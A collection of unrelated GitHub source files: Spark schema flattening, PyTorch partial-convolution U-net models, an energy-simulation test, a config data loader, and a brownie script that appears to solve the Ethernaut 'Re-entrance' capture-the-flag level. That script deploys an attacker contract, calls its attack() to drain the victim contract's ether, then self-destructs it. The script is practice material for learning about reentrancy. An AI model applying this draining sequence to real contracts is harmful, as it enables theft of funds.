dtype.add(fieldname_normaliser(field.name), __rename_nested_field__(field.dataType, fieldname_normaliser))
else:
dtype = in_field
return dtype
def __normalise_fieldname__(raw: str):
return re.sub('[^A-Za-z0-9_]+', '_', raw.strip())
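# Worked example: __normalise_fieldname__("sift score (max)") returns "sift_score_max_",
# since every run of non-alphanumeric characters collapses to a single underscore.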
def __get_fields_info__(dtype: DataType, name: str = ""):
ret = []
if isinstance(dtype, StructType):
for field in dtype.fields:
for child in __get_fields_info__(field.dataType, field.name):
wrapped_child = ["{prefix}{suffix}".format(
prefix=("" if name == "" else "`{}`.".format(name)), suffix=child[0])] + child[1:]
ret.append(wrapped_child)
elif isinstance(dtype, ArrayType) and (
isinstance(dtype.elementType, ArrayType) or isinstance(dtype.elementType, StructType)):
for child in __get_fields_info__(dtype.elementType):
wrapped_child = ["`{}`".format(name)] + child
ret.append(wrapped_child)
else:
return [["`{}`".format(name)]]
return ret
def normalise_fields_names(df: DataFrame, fieldname_normaliser=__normalise_fieldname__):
return df.select([
F.col("`{}`".format(field.name)).cast(__rename_nested_field__(field.dataType, fieldname_normaliser))
.alias(fieldname_normaliser(field.name)) for field in df.schema.fields
])
def flatten(df: DataFrame, fieldname_normaliser=__normalise_fieldname__):
cols = []
for child in __get_fields_info__(df.schema):
if len(child) > 2:
ex = "x.{}".format(child[-1])
for seg in child[-2:0:-1]:
if seg != '``':
ex = "transform(x.{outer}, x -> {inner})".format(outer=seg, inner=ex)
ex = "transform({outer}, x -> {inner})".format(outer=child[0], inner=ex)
else:
ex = ".".join(child)
cols.append(F.expr(ex).alias(fieldname_normaliser("_".join(child).replace('`', ''))))
return df.select(cols)
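# With the default normaliser, a nested column such as heterozygous.impact_level.HIGH
# flattens to a single top-level column named heterozygous_impact_level_HIGH; arrays of
# structs are unpacked element-wise via Spark's transform() higher-order function instead.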
# -
flattened_counts = flatten(written_counts, lambda name: name)
flattened_counts.printSchema()
flattened_counts.write.format("delta").save('/s/project/rep/processed/VEP/vep_counts_flattened3.deltalake')
displayHead(flattened_counts)
| Hoeze/firefly | scripts/AggregateVEP.py | AggregateVEP.py | py | 15,105 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.popen",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "psutil.virtual_memory",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.popen",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number... |
20472215584 | import torch
from torch import nn
import torch.nn.functional as F
from typing import List, Callable, ClassVar
from collections import namedtuple
from copy import deepcopy
from .nvidia import PartialConv2d as PC2D
class PartialConv2d(nn.Conv2d):
def __init__(self, *args, **kwargs):
        super(PartialConv2d, self).__init__(*args, **kwargs)
self.ones = torch.ones_like(self.weight)
self.n = self.ones.size(1) * self.ones.size(2) * self.ones.size(3)
self.mask = None
self.mask_for_input = None
self.mask_for_output = None
self.ratio = None
self.new_mask = None
def forward(self, input, mask=None):
assert input.dim() == 4
self.mask = mask
if self.mask is not None:
with torch.no_grad(): # try removing this
self.mask_for_input = self.mask.repeat(1, input.size(1), 1, 1) # same number of features as input
W = self.ones.to(input) # to move to same cuda device as input when necessary
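                # W is an all-ones kernel, so this convolution counts how many valid
                # (mask == 1) inputs fall under each kernel window; ratio = n / count then
                # rescales outputs so sparsely covered windows are not systematically
                # dimmed -- the same renormalization idea as the NVIDIA partial
                # convolutions imported above.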
self.mask_for_output = F.conv2d(self.mask_for_input, W, padding=self.padding, stride=self.stride)
self.ratio = self.n / (self.mask_for_output + 1e-8)
self.mask_for_output = self.mask_for_output.clamp(0, 1)
self.ratio = self.ratio * self.mask_for_output
# input = input * self.mask # THIS IS WHAT IS KILLING IT
            output = super(PartialConv2d, self).forward(input)
bias_view = self.bias.view(1, self.out_channels, 1, 1)
output = ((output - bias_view) * self.ratio) + bias_view
output = output * self.mask_for_output
            self.new_mask = self.mask_for_output.max(1, keepdim=True)[0]  # .max(dim) returns (values, indices); [0] keeps the values
else:
output = super().forward(input)
self.new_mask = None
assert output.dim() == 4
return output, self.new_mask
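# Minimal usage sketch (shapes and values are illustrative assumptions, not from this file):
#   pconv = PartialConv2d(3, 8, kernel_size=3, padding=1)
#   x = torch.randn(1, 3, 16, 16)
#   mask = torch.randint(0, 2, (1, 1, 16, 16)).float()  # 1 = valid pixel, 0 = hole
#   y, new_mask = pconv(x, mask)  # y: (1, 8, 16, 16); new_mask: (1, 1, 16, 16)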
class PartialTransposeConv2d(nn.ConvTranspose2d):
def __init__(self, *args, **kwargs):
super(PartialTransposeConv2d, self).__init__(*args, **kwargs)
self.ones = torch.ones_like(self.weight)
self.n = self.ones.size(1) * self.ones.size(2) * self.ones.size(3)
self.mask = None
self.mask_for_input = None
self.mask_for_output = None
self.ratio = None
self.new_mask = None
def forward(self, input, mask=None):
assert input.dim() == 4
self.mask = mask
if self.mask is not None:
with torch.no_grad():
self.mask_for_input = self.mask.repeat(1, input.size(1), 1, 1) # same number of features as input
W = self.ones.to(input) # to move to same cuda device as input when necessary
self.mask_for_output = F.conv_transpose2d(self.mask_for_input, W, padding=self.padding, stride=self.stride)
self.ratio = self.n / (self.mask_for_output + 1e-8)
self.mask_for_output = self.mask_for_output.clamp(0, 1)
self.ratio = self.ratio * self.mask_for_output
            # input = input * self.mask # in principle not necessary since the first input is masked and the output is masked with the new mask
output = super(PartialTransposeConv2d, self).forward(input)
bias_view = self.bias.view(1, self.out_channels, 1, 1)
# output = ((output - bias_view) * self.ratio) + bias_view
# output = output * self.mask_for_output
self.new_mask = self.mask_for_output.max(1, keepdim=True)[0]
else:
output = super().forward(input)
self.new_mask = None
assert output.dim() == 4
return output, self.new_mask
class Hyperparameters:
"""
The base class to hold model hyperparameters.
Params and Attributes:
in_channels (int): the number of input channels (or features).
hidden_channels (int): the number of channels of the hidden layers.
        out_channels (int): the number of output channels (or features).
dropout_rate (float): dropout rate during training
"""
def __init__(self, in_channels: int=None, hidden_channels: int=None, out_channels: int=None, dropout_rate: float=None):
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.out_channels = out_channels
self.dropout_rate = dropout_rate
def __str__(self):
return "; ".join([f"{a}={v}" for a, v in self.__dict__.items()])
class Container(nn.Module):
"""
Base class for 1D or 2D Container models. This class is not meant to be instantiated, only its subclasses.
    It includes an adapter layer that adapts the input channels to the desired number of hidden channels.
    It includes a compression layer that adapts the hidden channels to the desired number of output channels.
    Adapter and compression layers are each followed by an ELU activation and batch normalization.
Params:
hp (Hyperparameters): the hyperparameters of the model.
model (ClassVar): the class of the internal model of the Container (Unet or CatStack, 1d or 2d versions).
conv (ClassVar): the class of the convolution (nn.Conv1d or nn.Conv2d) used for the adapter and compression layers.
bn (ClassVar): the class of the BatchNorm layer (nn.BatchNorm1d or nn.BatchNorm2d)
"""
def __init__(self, hp: Hyperparameters, model: ClassVar, conv: ClassVar, bn: ClassVar):
super().__init__()
self.hp = hp
self.out_channels = self.hp.out_channels
self.adaptor = conv(self.hp.in_channels, self.hp.hidden_channels, 1, 1)
self.BN_adapt = bn(self.hp.hidden_channels)
self.model = model(self.hp)
self.compress = conv(self.hp.hidden_channels, self.hp.out_channels, 1, 1)
self.BN_out = bn(self.hp.out_channels)
def forward(self, x):
x = self.adaptor(x)
x = self.BN_adapt(F.elu(x, inplace=True))
z = self.model(x)
z = self.compress(z)
z = self.BN_out(F.elu(z, inplace=True)) # need to try without to see if it messes up average gray level
return z
class Container1d(Container):
"""
1D Container model.
Params:
hp (Hyperparameters): the hyperparameters of the model.
model (ClassVar): the class of the internal model of the Container.
"""
def __init__(self, hp: Hyperparameters, model: ClassVar):
super().__init__(hp, model, nn.Conv1d, nn.BatchNorm1d)
class Container2d(Container):
"""
2D Container model.
Params:
hp (Hyperparameters): the hyperparameters of the model.
model (ClassVar): the class of the internal model of the Container.
"""
def __init__(self, hp: Hyperparameters, model: ClassVar):
super().__init__(hp, model, nn.Conv2d, nn.BatchNorm2d)
class Container2dPC(nn.Module):
"""
    2D Container using partial convolutions: it wraps a Unet2dPC between the adapter and compression layers
    and forwards an optional validity mask to it.
    Params:
        hp (Hyperparameters): the hyperparameters of the model.
"""
def __init__(self, hp: Hyperparameters):
super().__init__()
self.hp = hp
self.out_channels = self.hp.out_channels
self.adaptor = nn.Conv2d(self.hp.in_channels, self.hp.hidden_channels, 1, 1)
self.BN_adapt = nn.BatchNorm2d(self.hp.hidden_channels)
self.model = Unet2dPC(self.hp) # CatStack2dPC(self.hp) #
self.compress = nn.Conv2d(self.hp.hidden_channels, self.hp.out_channels, 1, 1)
self.BN_out = nn.BatchNorm2d(self.hp.out_channels)
def forward(self, x, mask=None):
x = self.adaptor(x)
x = self.BN_adapt(F.elu(x, inplace=True))
z = self.model(x, mask)
z = self.compress(z)
z = self.BN_out(F.elu(z, inplace=True)) # need to try without to see if it messes up average gray level
return z
class HyperparametersUnet(Hyperparameters):
"""
Hyperparameters for U-net models. Extends the base class Hyperparameters.
    The number of layers (depth) of the U-net is specified simply by giving appropriately sized lists of channels, kernels and strides.
    Usage: a three-layer U-net is specified with the following hyperparameters
HyperparametersUnet(
nf_table=[2,4,8, 16], # 1st layer: 2 -> 4 channels, 2nd layer: 4 -> 8 channels; 3rd layer: 8 -> 16 channels.
kernel_table=[3,3,3], # the three layers use same kernel 3
stride_table=[1,1,1], # the three layers use the same stride 1
pool=True, # pooling switched on
in_channels=2, # params from base class
hidden_channels=2, # params from base class
out_channels=3, # params from base class
dropout_rate=0.1 # params from base class
)
Params and Attributes:
        nf_table (List[int]): the number of channels (features) of each layer in the form [in_channels, out/in_channels, in/out_channels, in/out_channels, ...]
kernel_table (List[int]): a list of the kernels for each layer.
stride_table (List[int]): a list of the strides for each layer.
pool (bool): indicate whether to include a pool/unpool step between layers.
"""
def __init__(self, nf_table: List[int], kernel_table: List[int], stride_table: List[int], pool:bool, **kwargs):
super().__init__(**kwargs)
self.hidden_channels = nf_table[0]
self.nf_table = nf_table
self.kernel_table = kernel_table
self.stride_table = stride_table
self.pool = pool
class Unet(nn.Module):
"""
Base class of 1D or 2D U-net models. This class is not meant to be instantiated.
    The U-net is built recursively. The kernel, stride and number of features of each layer are provided as lists in the HyperparametersUnet object.
Params:
        hp (HyperparametersUnet): the model hyperparameters.
conv (ClassVar): the class of the convolution (nn.Conv1d or nn.Conv2d) used for the descending branch of the U-net.
convT (ClassVar): the class of the transpose convolution (nn.ConvTranspose1d or nn.ConvTranspose2d) used for the ascending branch of the U-net.
bn (ClassVar): the class of the BatchNorm layer (nn.BatchNorm1d or nn.BatchNorm2d).
        pool (Callable): the pooling function (F.avg_pool1d or F.avg_pool2d).
"""
def __init__(self, hp: HyperparametersUnet, conv: ClassVar, convT: ClassVar, bn: ClassVar, pool: Callable):
super().__init__()
self.hp = deepcopy(hp) # pop() will modify lists in place
self.nf_input = self.hp.nf_table[0]
self.nf_output = self.hp.nf_table[1]
self.hp.nf_table.pop(0)
self.kernel = self.hp.kernel_table.pop(0)
self.stride = self.hp.stride_table.pop(0)
self.dropout_rate = self.hp.dropout_rate
self.dropout = nn.Dropout(self.dropout_rate)
self.conv_down = conv(self.nf_input, self.nf_output, self.kernel, self.stride)
self.BN_down = bn(self.nf_output)
self.pool = pool
self.conv_up = convT(self.nf_output, self.nf_input, self.kernel, self.stride)
self.BN_up = bn(self.nf_input)
if len(self.hp.nf_table) > 1:
self.unet = self.__class__(self.hp)
else:
self.unet = None
# self.reduce = conv(self.nf_input + self.nf_output, self.nf_input, 3, 1, 1)
self.reduce = conv(2 * self.nf_input, self.nf_input, 3, 1, 1)
self.BN_out = bn(self.nf_input)
def forward(self, x):
y = self.dropout(x)
y = self.conv_down(y)
y = self.BN_down(F.relu(y, inplace=True)) # ReLU on down branch
if self.unet is not None:
if self.hp.pool:
y_size = y.size()
y = self.pool(y, 2, 2)
y = self.unet(y)
if self.hp.pool:
y = F.interpolate(y, y_size[-1])
y = self.dropout(y) # optional
y = self.conv_up(y)
y = self.BN_up(F.elu(y, inplace=True)) # Elu on up branch
# y = F.interpolate(y, x.size(-1), mode='nearest')
y = torch.cat((x, y), 1)
y = self.reduce(y)
y = self.BN_out(F.elu(y, inplace=True))
return y
class Unet2dPC(nn.Module):
"""
    A 2D U-net built from partial convolutions, so an optional validity mask is propagated through the network.
    The U-net is built recursively. The kernel, stride and number of features of each layer are provided as lists in the HyperparametersUnet object.
Params:
hp (HyperparameterUnet): the model hyperparameters.
"""
def __init__(self, hp: HyperparametersUnet):
super().__init__()
self.hp = deepcopy(hp) # pop() will modify lists in place
self.nf_input = self.hp.nf_table[0]
self.nf_output = self.hp.nf_table[1]
self.hp.nf_table.pop(0)
self.kernel = self.hp.kernel_table.pop(0)
self.stride = self.hp.stride_table.pop(0)
self.dropout_rate = self.hp.dropout_rate
self.dropout = nn.Dropout(self.dropout_rate)
        self.conv_down = PartialConv2d(self.nf_input, self.nf_output, self.kernel, self.stride)
self.BN_down = nn.BatchNorm2d(self.nf_output)
self.pool = F.max_pool2d
self.conv_up = PartialTransposeConv2d(self.nf_output, self.nf_input, self.kernel, self.stride)
self.unpool = F.max_unpool2d
self.BN_up = nn.BatchNorm2d(self.nf_input)
if len(self.hp.nf_table) > 1:
self.unet = self.__class__(self.hp)
else:
self.unet = None
self.reduce = nn.Conv2d(2*self.nf_input, self.nf_input, 1, 1)
self.BN_out = nn.BatchNorm2d(self.nf_input)
def forward(self, x, mask=None):
y = self.dropout(x)
y, new_mask = self.conv_down(y, mask)
y = self.BN_down(F.elu(y, inplace=True))
if self.unet is not None:
if self.hp.pool:
y_size = y.size()
y, indices = self.pool(y, 2, stride=2, return_indices=True)
if new_mask is not None:
new_mask_size = new_mask.size()
new_mask, mask_indices = self.pool(new_mask, 2, stride=2, return_indices=True)
y = self.unet(y, new_mask)
if self.hp.pool:
                y = self.unpool(y, indices, 2, stride=2, output_size=list(y_size))  # list(y_size) works around a bug in torch 1.0.1; not needed in 1.4.0
if new_mask is not None:
new_mask = self.unpool(new_mask, mask_indices, 2, stride=2, output_size=list(new_mask_size))
y = self.dropout(y)
y, _ = self.conv_up(y, new_mask)
y = self.BN_up(F.elu(y, inplace=True))
# y = torch.cat((x, y), 1)
# y = self.reduce(y)
y = self.BN_out(F.elu(y, inplace=True))
return y
class Unet1d(Unet):
"""
1D U-net.
Params:
hp (HyperparametersUnet): the U-net hyperparameters.
"""
def __init__(self, hp: HyperparametersUnet):
super().__init__(hp, nn.Conv1d, nn.ConvTranspose1d, nn.BatchNorm1d, F.avg_pool1d)
class Unet2d(Unet):
"""
2D U-net.
Params:
hp (HyperparametersUnet): the U-net hyperparameters.
"""
def __init__(self, hp: HyperparametersUnet):
super().__init__(hp, nn.Conv2d, nn.ConvTranspose2d, nn.BatchNorm2d, F.avg_pool2d)
class HyperparametersCatStack(Hyperparameters):
"""
Hyperparameters for CatStack models. Extends the base class Hyperparameters.
    Usage: a two-layer CatStack is specified with the following hyperparameters
    HyperparametersCatStack(
        N_layers=2,
        kernel=7,
        padding=3,
        stride=1,
in_channels=2, # params from base class
hidden_channels=2, # params from base class
out_channels=3, # params from base class
dropout_rate=0.1 # params from base class
)
Params and Attributes:
N_layers (int): the number of layers.
        kernel (int): kernel size of the convolution step.
padding (int): padding added to each convolution.
stride (int): stride of the convolution.
"""
def __init__(self, N_layers, kernel, padding, stride, **kwargs):
super().__init__(**kwargs)
self.N_layers = N_layers
self.kernel = kernel
self.padding = padding
self.stride = stride
class ConvBlock(nn.Module):
"""
    Base class of a convolution block applying dropout, a convolution, and a batch-normalized ELU activation.
This class is not meant to be instantiated.
Params:
hp (Hyperparameters):
conv (ClassVar): the class of the convolution (nn.Conv1d or nn.Conv2d) used for the adapter and compression layers.
bn (ClassVar): the class of the BatchNorm layer (nn.BatchNorm1d or nn.BatchNorm2d)
"""
def __init__(self, hp: Hyperparameters, conv:ClassVar, bn: ClassVar):
self.hp = hp
super().__init__()
self.dropout = nn.Dropout(self.hp.dropout_rate)
self.conv = conv(self.hp.hidden_channels, self.hp.hidden_channels, self.hp.kernel, self.hp.stride, self.hp.padding)
self.BN = bn(self.hp.hidden_channels)
def forward(self, x):
x = self.dropout(x)
x = self.conv(x)
x = self.BN(F.elu(x, inplace=True))
return x
class ConvBlock2dPC(nn.Module):
"""
    A 2D partial-convolution block applying dropout, a partial convolution, and a batch-normalized ELU activation.
Params:
hp (Hyperparameters):
"""
def __init__(self, hp: Hyperparameters):
self.hp = hp
super().__init__()
self.dropout = nn.Dropout(self.hp.dropout_rate)
        self.conv = PartialConv2d(self.hp.hidden_channels, self.hp.hidden_channels, self.hp.kernel, self.hp.stride, self.hp.padding) #, multi_channel=True, return_mask=True)
self.BN = nn.BatchNorm2d(self.hp.hidden_channels)
def forward(self, x, mask=None):
x = self.dropout(x)
x, mask = self.conv(x, mask)
x = self.BN(F.elu(x, inplace=True))
assert x.dim() == 4
return x, mask
class CatStack2dPC(nn.Module):
"""
    A 2D CatStack model made of a concatenated stack of partial-convolution blocks.
Params:
hp (HyperparametersCatStack)
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__()
self.hp = hp
self.conv_stack = nn.ModuleList()
for i in range(self.hp.N_layers):
self.conv_stack.append(ConvBlock2dPC(hp))
self.reduce = nn.Conv2d((1 + self.hp.N_layers) * self.hp.hidden_channels, self.hp.hidden_channels, 1, 1)
self.BN = nn.BatchNorm2d(self.hp.hidden_channels)
def forward(self, x, mask=None):
x_list = [x]
for i in range(self.hp.N_layers):
x, mask = self.conv_stack[i](x, mask)
x_list.append(x)
x = torch.cat(x_list, 1)
x = self.reduce(x)
y = self.BN(F.elu(x, inplace=True))
assert y.dim() == 4
return y
class CatStack(nn.Module):
"""
Base class for a CatStack model made of a concatenated stack of convolution blocks. This class is not meant to be instantiated.
Params:
hp (HyperparametersCatStack):
conv (ClassVar): the class of the convolution (nn.Conv1d or nn.Conv2d) used for the adapter and compression layers.
bn (ClassVar): the class of the BatchNorm layer (nn.BatchNorm1d or nn.BatchNorm2d)
conv_block (ClassVar): the class of convolution block to build the stack.
"""
def __init__(self, hp: HyperparametersCatStack, conv: ClassVar, bn: ClassVar, conv_block: ClassVar):
super().__init__()
self.hp = hp
self.conv_stack = nn.ModuleList()
for i in range(self.hp.N_layers):
self.conv_stack.append(conv_block(hp))
self.reduce = conv((1 + self.hp.N_layers) * self.hp.hidden_channels, self.hp.hidden_channels, 1, 1)
self.BN = bn(self.hp.hidden_channels)
def forward(self, x):
x_list = [x]
for i in range(self.hp.N_layers):
x = self.conv_stack[i](x)
x_list.append(x)
x = torch.cat(x_list, 1)
x = self.reduce(x)
y = self.BN(F.elu(x, inplace=True))
return y
class Autoencoder1d(nn.Module):
"""
    A 1D autoencoder based on a Container1d wrapping a given model (e.g. CatStack1d).
    The Container1d layer is followed by a reduction layer that adapts the number of output channels
    to be equal to the number of input channels.
    Params:
        hp (Hyperparameters): hyperparameters of the internal model.
        model (ClassVar): the class of the internal model (e.g. CatStack1d or Unet1d).
"""
def __init__(self, hp: Hyperparameters, model: ClassVar):
super(Autoencoder1d, self).__init__()
self.in_channels = hp.in_channels
self.hp = hp
self.embed = Container1d(hp=self.hp, model=model)
self.reduce = nn.Conv1d(self.embed.out_channels, self.in_channels, 1, 1)
def forward(self, x):
y = self.embed(x)
y = self.reduce(F.elu(y))
return y
class ConvBlock1d(ConvBlock):
"""
A 1D convolution block.
Params:
        hp (HyperparametersCatStack): the CatStack hyperparameters.
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__(hp, nn.Conv1d, nn.BatchNorm1d)
class CatStack1d(CatStack):
"""
    A 1D stacked-convolution CatStack model.
Params:
        hp (HyperparametersCatStack): hyperparameters.
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__(hp, nn.Conv1d, nn.BatchNorm1d, ConvBlock1d)
class ConvBlock2d(ConvBlock):
"""
A 2D convolution block.
Params:
        hp (HyperparametersCatStack): hyperparameters.
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__(hp, nn.Conv2d, nn.BatchNorm2d)
class CatStack2d(CatStack):
"""
    A 2D stacked-convolution CatStack model.
Params:
        hp (HyperparametersCatStack): hyperparameters.
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__(hp, nn.Conv2d, nn.BatchNorm2d, ConvBlock2d)
def self_test():
hpcs = HyperparametersCatStack(N_layers=2, kernel=7, padding=3, stride=1, in_channels=1, out_channels=3, hidden_channels=2, dropout_rate=0.1)
cs2d = CatStack2d(hpcs)
cb2d = ConvBlock2d(hpcs)
cs1d = CatStack1d(hpcs)
cb1d = ConvBlock1d(hpcs)
hpun = HyperparametersUnet(nf_table=[2,2,2], kernel_table=[3,3], stride_table=[1,1,1], pool=True, in_channels=1, hidden_channels=2, out_channels=3, dropout_rate=0.1)
un2d = Unet2d(hpun)
c1dcs = Container1d(hpcs, CatStack1d)
c2dcs = Container2d(hpcs, CatStack2d)
c2dcs_PC = Container2dPC(hpun)
c1dun = Container1d(hpun, Unet1d)
c2dun = Container2d(hpun, Unet2d)
cs1d(torch.ones(2, hpcs.hidden_channels, 100))
cs2d(torch.ones(2, hpcs.hidden_channels, 10, 10))
cb1d(torch.ones(2, hpcs.hidden_channels, 100))
cb2d(torch.ones(2, hpcs.hidden_channels, 10, 10))
c1dcs(torch.ones(2, hpcs.in_channels, 100))
c2dcs(torch.ones(2, hpcs.in_channels, 10, 10))
c1dun(torch.ones(2, hpcs.in_channels, 100))
c2dun(torch.ones(2, hpcs.in_channels, 10, 10))
c2dcs_PC(torch.ones(2, hpcs.in_channels, 10, 10), torch.randint(0, 2,(2, 1, 10, 10)).float())
print("It seems to work: all classes could be instantiated and input forwarded.")
def main():
self_test()
if __name__ == '__main__':
main() | source-data/ai | toolbox/models.py | models.py | py | 23,355 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "torch.nn.Conv2d",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "torch.ones_like",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"li... |
23467172721 | #!/usr/bin/python3
from brownie import Reentrance, Attack
from scripts.deploy import deploy
from scripts.helpful_scripts import get_account
from colorama import Fore
from web3 import Web3 as w3
# * colours
green = Fore.GREEN
red = Fore.RED
blue = Fore.BLUE
magenta = Fore.MAGENTA
reset = Fore.RESET
# * Rinkeby address : 0x402C04B14625dAcb8f8Db3e535b9B3E210C3dd79
AMOUNT = "0.001 ether"
def convert_fromWei(value):
return w3.fromWei(value, "ether")
def reentrance(contract_address=None, attacker=None):
if not contract_address:
reentrance_contract, owner = deploy()
contract_address = reentrance_contract.address
_, attacker = get_account()
else:
reentrance_contract = Reentrance.at(contract_address)
# print(contract_address)
print(
f"{green}Current Contract Balance -> {magenta}{convert_fromWei(reentrance_contract.balance())} ETH{reset}"
)
# exit(1)
# * deploy the malicious contract
    attack_contract = Attack.deploy(
        reentrance_contract.address, AMOUNT, {"from": attacker}
    )
reentrance_contract.donate(
        attack_contract.address, {"from": attacker, "amount": AMOUNT}
)
    attack_contract.attack({"from": attacker, "allow_revert": True})
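    # Presumably the Attack contract's receive/fallback re-enters the victim's
    # withdraw() before its balance bookkeeping is updated, draining it recursively.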
print(f"{red}Attack Successful!!!{reset}")
print(
f"{green}Current Contract Balance -> {magenta}{convert_fromWei(reentrance_contract.balance())} ETH{reset}"
)
    attack_contract.destroy()
print(
f"{green}Balance of the attacker: {red}{convert_fromWei(attacker.balance())}{reset} ETH"
)
def main(contract_address=None):
if contract_address:
        reentrance(contract_address, get_account()[1])
else:
reentrance()
if __name__ == "__main__":
main()
| Aviksaikat/Blockchain-CTF-Solutions | ethernaut/Re-entrance_DONE/scripts/attack.py | attack.py | py | 1,759 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "colorama.Fore.GREEN",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "colorama.Fore.RED",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "colorama.... |
20838574752 | from cases import *
import pandas as pd
import scipy.io
import sys
def compare_cases():
coefs=scipy.io.loadmat("../data/timeseries.mat")
trend_coefs=pd.read_csv("../data/trends.csv")
season_coefs=pd.read_csv("../data/season.csv")
num_years=1
start_year=2020
num_simulations=100
seed=0
params=[coefs,trend_coefs,season_coefs,num_years,start_year,seed,"independent",0,0]
cases=[case0(*params[:-2]),case1(*params),case2(*params),case3_1(*params),case3_2(*params),case3_3(*params)]
for case in cases:
case.sendable_max=0
try:
case.platform_restriction=0
except:
pass
case.simulate_n_years(n=num_simulations)
assert np.all(np.abs(case.get_CO2()-cases[0].get_CO2())/1e9<1e-12)
compare_cases()
def simulate_5_steps_test(): # Test whether the simulation setup works as intended, by calculating the results more explicitly than the for loops do
def coefs_to_function(trend_coef,season_coef,period):
trendfunc=np.poly1d(trend_coef)
seasonfunc=np.poly1d(season_coef)
def seasonfunc_periodic(t):
return seasonfunc((t-1)%period)
return (lambda t:seasonfunc_periodic(t*period/52)+trendfunc(t*period/52))
coefs=scipy.io.loadmat("../data/timeseries.mat")
trend_coefs=pd.read_csv("../data/trends.csv")
season_coefs=pd.read_csv("../data/season.csv")
sigma_windsun=coefs["windsun_sigma"]
#print(sigma_windsun)
num_years=1
start_year=2020
num_simulations=100
seed=0
params=[coefs,trend_coefs,season_coefs,num_years,start_year,seed,0,0]
testcase=case0(*params[:-2])
testcase.simulate_n_years(n=1) #Simulate for one year
simulation_results=testcase.simulation_results[:,:10]/(24*7)
rng_wind=np.random.default_rng(0)
rng_load=np.random.default_rng(1)
rng_water=np.random.default_rng(2)
order=["wind NO","wind DE","load NO","load DE","water NO","solar DE"]
periods=[52,52,52,52,13,52]
functions=[]
for i in range(6):
trend=trend_coefs[order[i]]
season=season_coefs[order[i]]
functions.append(coefs_to_function(trend,season,period=periods[i]))
sigma_windsun=coefs["windsun_sigma"]
matrix_windsun=coefs["windsun_coefs"][0]
#print(matrix_windsun) #test correctness
#print(sigma_windsun) #test correctness
matrix_load_ar1=coefs["load_coefs"][0]
matrix_load_ar2=coefs["load_coefs"][1]
matrix_load_ar3=coefs["load_coefs"][2]
sigma_water=coefs["water_sigma"]
sigma_load=coefs["load_sigma"]
#print(matrix_load_ar1);print(matrix_load_ar2);print(matrix_load_ar3);print(sigma_load) #test correctness
#print(sigma_water)
random_numbers_windsun=np.zeros((10,3))
random_numbers_load=np.zeros((10,2))
for i in range(10):
random_numbers_windsun[i]=rng_wind.multivariate_normal(np.zeros(3),sigma_windsun)
random_numbers_load[i]=rng_load.multivariate_normal(np.zeros(2),sigma_load)
#print(random_numbers_windsun)
random_numbers_water=np.zeros(10)
sigmawater=np.sqrt(sigma_water[1,1]) #standard deviation for water
sigmaload=np.sqrt(sigma_water[0,0]) #Standard deviation for load
p=sigma_water[1,0]/(sigmawater*sigmaload) #rho in the covariance matrix
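    # Conditional law of a zero-mean bivariate normal:
    #   water | load = x  ~  N(rho * (sigma_water / sigma_load) * x, (1 - rho^2) * sigma_water^2)
    # which is exactly what rng_water.normal(...) draws below.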
for i in range(10):
random_numbers_water[i]=rng_water.normal(sigmawater/sigmaload*p*random_numbers_load[i,0],np.sqrt((1-p**2))*sigmawater)
results_windsun=np.zeros((10,3))
results_loads=np.zeros((10,2))
results_water=np.zeros(10)
for i in range(10):
results_windsun[i]=matrix_windsun@results_windsun[i-1]+random_numbers_windsun[i]
results_loads[i]=matrix_load_ar1@results_loads[i-1]+matrix_load_ar2@results_loads[i-2]+matrix_load_ar3@results_loads[i-3]+random_numbers_load[i]
results=np.zeros((10,6))
for i in range(0,4):
results_water[i]=random_numbers_water[i]
for i in range(4,8):
mean=np.mean(results_water[0:4])
results_water[i]=random_numbers_water[i]+mean*1.189324
for i in range(8,10):
mean=np.mean(results_water[4:8])
mean_prev=np.mean(results_water[0:4])
results_water[i]=random_numbers_water[i]+mean*1.189324+mean_prev*(-0.484997)
for i in range(10):
time=i+(start_year-2017)*52
results[i,0]=np.exp(functions[0](time)+results_windsun[i,0]) #Norwegian wind
results[i,2]=np.exp(functions[2](time)+results_loads[i,0]) #Norwegian load
results[i,1]=np.exp(functions[1](time)+results_windsun[i,1]) #German wind
results[i,3]=np.exp(functions[3](time)+results_loads[i,1]) #German load
results[i,4]=np.exp(functions[4](time)+results_water[i]) #Water NO
results[i,5]=np.exp(functions[5](time)+results_windsun[i,2]) #German sun
assert np.all(np.abs(results.T-simulation_results)<0.01)
simulate_5_steps_test()
| schraderSimon/NorwayGermanyProject | code/testfunctions.py | testfunctions.py | py | 4,835 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "scipy.io.io.loadmat",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "scipy.io.io",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "scipy.io",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"lin... |
26345201031 | ## read params
## process
## return dataframe
import os
import yaml
import pandas as pd
import argparse
# read the params from the config path and return the parsed YAML file as a dictionary
def read_params(config_path):
with open(config_path) as yaml_file:
config = yaml.safe_load(yaml_file)
return config
#This function will get the data
def get_data(config_path):
    # read the params from the configuration file at the given configuration path
config = read_params(config_path) #here calling the above method read_params()
#print(config)
#
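    # Expected params.yaml shape for the lookup below (the path value is a hypothetical example):
    # data_source:
    #   s3_source: data/raw/data.csv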
data_path = config["data_source"]["s3_source"]
df = pd.read_csv(data_path, sep=",", encoding='utf-8')
#print(df.head())
    return df  # return the dataframe; it will be assigned to `data` in the main block below
if __name__=="__main__":
args = argparse.ArgumentParser()
args.add_argument("--config", default="params.yaml")
parsed_args = args.parse_args()
